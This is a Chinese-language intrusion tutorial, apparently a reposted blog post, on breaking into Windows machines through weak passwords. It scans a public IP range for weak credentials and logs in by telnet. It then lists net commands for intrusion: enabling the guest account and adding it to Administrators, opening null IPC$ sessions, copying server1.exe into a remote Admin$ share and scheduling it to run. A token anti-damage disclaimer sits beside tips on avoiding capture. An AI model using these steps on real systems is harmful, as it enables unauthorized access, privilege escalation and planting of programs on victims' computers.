[教程]系统漏洞渗透

首先给你讲解一下系统漏洞:

系统漏洞是指操作的编写存在一些缺陷或者是错误,而黑客就可以通过这个系统漏洞**计算机。

今天来讲讲系统漏洞的利用。

下载一个啊D网络工具包(这个是国内比较著名的扫描工具,功能齐全),然后记住要用外网,或者给内网做一个映射。

首先先选择IP(我填写的是218.76.40.1至218.76.40.225),然后要填写端口了。

在这里讲解一下端口普及知识

第一种是公认端口:端口号为0——1023。这些通常是绑定着一些服务的。像80端口就分配给了WEB的访问(www服务),而21端口则是分配给了FTP的这些服务。

第二种是注册端口:端口号为1024——49151。这里大家不要以为是注册账号的端口,这个完全是两码事。这种端口通常用于一些安装软件的服务,像QQ之类的软件。qq的端口我记得是4000.

第三种是动态/私有端口:端口号为49152——65535。这里我很悟不透,因为从1024之后就属于动态/私有端口了,不知道为什么这里还要再分类,只知道它的一个例外是RPC是配对着32768。

讲解完端口之后找到你要填写对方PC的端口号,但是这点你要注意,如果你要通过你填写的端口而连接对方的计算机,那么你也要开通自己的那个端口。

端口的打开方法:http://wenku.baidu.com/view/614fc470a417866fb84a8e6d.html

扫到了以后选择开始查找,这是在查找对方的账号和密码而获取若口令,像密码为123456789,这种密码就叫做弱口令,表示密码很简单。

假设我找到了192.153.1.101这个ip的账号和密码,账号为admin,密码为123。找到了以后,打开CMD指令(什么是CMD指令这个就不用说了吧,要是不知道的上网查),输入“telnet 192.153.1.101”,然后按下回车键,输入账号和密码。**成功!!!

接下来你就可以运用CMD指令对对方机子的文件进行查看,拷贝,或者添加及运行。比如输入“dir/w”,这个是查看C盘目录的指令。

附:这里要说明一下,现在XP及WIN7的计算机很难用这个方法破解了,因为微软随时发布着补丁,用补丁把系统漏洞补上之后,那个漏洞也就无用了,但是2000的机子一扫一大堆都存在漏洞。还有就是大家**的时候要好好防御自己的电脑,防止被抓。另外,我们是红客,不是骇客,请勿对他人计算机进行破坏。

在web上copy的一些命令:

==================================================================

                    一些常用的DOS网络命令  

==================================================================

net share abc$=c:\                                 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录)

net share c$ /del                                  禁止C$共享

net use z: \\*.*.*.*\C$                            把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘

net use c: /del                                    删除映射的c盘

net use * /del /y                                  删除全部

net start                                          显示本地主机当前服务

net start telnet                                   启动 Telnet 服务  

net start Server                                   启动 Server 服务 (IPC$ 和共享要靠这个服务)

net stop Messenger                                 停止信使服务(不会在有烦人的Win的弹出广告了)!

net stop  server                                   停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$**)

net user                                           得到本地主机的用户列表

net user guest /active:yes                         将停用的guest帐号激活(变为可用)

net user guest 888888                              把 Guest 帐号的密码改为 888888

net localgroup Administrators guest /add           把 Guest 加到Administrators组中(这样你就有了超级权限了)

net view \\*.*.*.*                                 查看指定IP主机上的共享

nbtstat -A *.*.*.*                                 得到远程主机的NetBIOS用户名列表

net share                                          查看本地主机的共享资源(本地的默认共享也可以看到)

net use \\*.*.*.*\ipc$ "" /user:""                 建立空连接

telnet *.*.*.* 90                                  连接对方机子的telnet,端口为90

ipconfig                                           查看本机的IP信息

**ipc过程序命令

-----------------------------------------------

net use \\*.*.*.*\ipc$ "" /user:"Administrator"    建立用户名为 Administrator 密码为空的连接

copy server1.exe \\*.*.*.*\Admin$\system32         即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内

net time \\*.*.*.*                                 查看远程主机的当前时间

at \\*.*.*.* 14:00 server1.exe                     在对方机子添加一个在 14:00 运行 server1.exe 的任务

netstat [-r] [-s] [-n] [-a]

参数含义:

-r 显示本机路由表的内容;

-s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议);

-n 以数字表格形式显示地址和端口;

-a 显示所有主机的端口号。

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏纯洁的微笑

springboot(十九):使用Spring Boot Actuator监控应用

微服务的特点决定了功能模块的部署是分布式的,大部分功能模块都是运行在不同的机器上,彼此通过服务调用进行交互,前后台的业务流会经过很多个微服务的处理和传递,出现了...

39070
来自专栏FreeBuf

如何防止Mimikatz「获取」Windows密码

黑客总是在用最简单的攻击方式来实现他们的目的,比如用已经存在了好多年的工具——Mimikatz(猕猴桃),它可以从系统内存中轻松获取到明文密码。 受影响的系统 ...

23680
来自专栏技术之路

破解.net程序 编译和反编译方法

 有好多.net程序有加密狗或者有验证,如果exe或dll没有做过特殊处理,破解.net程序其实很简单,不过你要有足够的耐心! 我只做个简单的小例子,给大家...

23750
来自专栏为数不多的Android技巧

如何调试Android Framework?

Linus有一句名言广为人知:Read the fucking source code. 但其实,要深入理解某个软件、框架或者系统的工作原理,仅仅「看」代码是远...

27310
来自专栏FreeBuf

国产漏洞靶场Webug 3.0发布

Webug名称定义为“我们的漏洞”靶场环境,基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。...

454100
来自专栏10km的专栏

cmake: 使用jom实现msvc工程并发编译提高速度(-j)

msvc提供的nmake并没有并发编译功能(类似gcc make的-j参数指定并发编译的任务数), 而第三方工具jom(http://wiki.qt.io/...

27880
来自专栏崔庆才的专栏

一言不合就改成 777 权限?会出人命的!

最近和几个朋友开发项目,期间使用了一台服务器跑模型,这台服务器是多人公用的,很多人都在上面有自己的账号,互不干涉内政,一切看起来十分井然有序。

72830
来自专栏Android机动车

Jenkins实现Android自动打包

14年在给天天酷跑团队做sdk的算是第一次接触到Jenkins,当时有种乡下孩子进城的感觉,被jenkins流弊的体验所折服,只需要一个按钮点一下就坐等出包,不...

26820
来自专栏Gaussic

使用IntelliJ IDEA开发SpringMVC网站(一)开发环境 顶

访问GitHub下载最新源码:https://github.com/gaussic/SpringMVCDemo

26210
来自专栏信安之路

OWASP Top 10关键点记录

注入攻击漏洞,例如SQL,OS以及LDAP注入。这些攻击发生在当不可信的数据作为命令或者查询语句的一部分,被发送给解释器的时候。攻击者发送的恶意数据可以欺骗解释...

11700

扫码关注云+社区

领取腾讯云代金券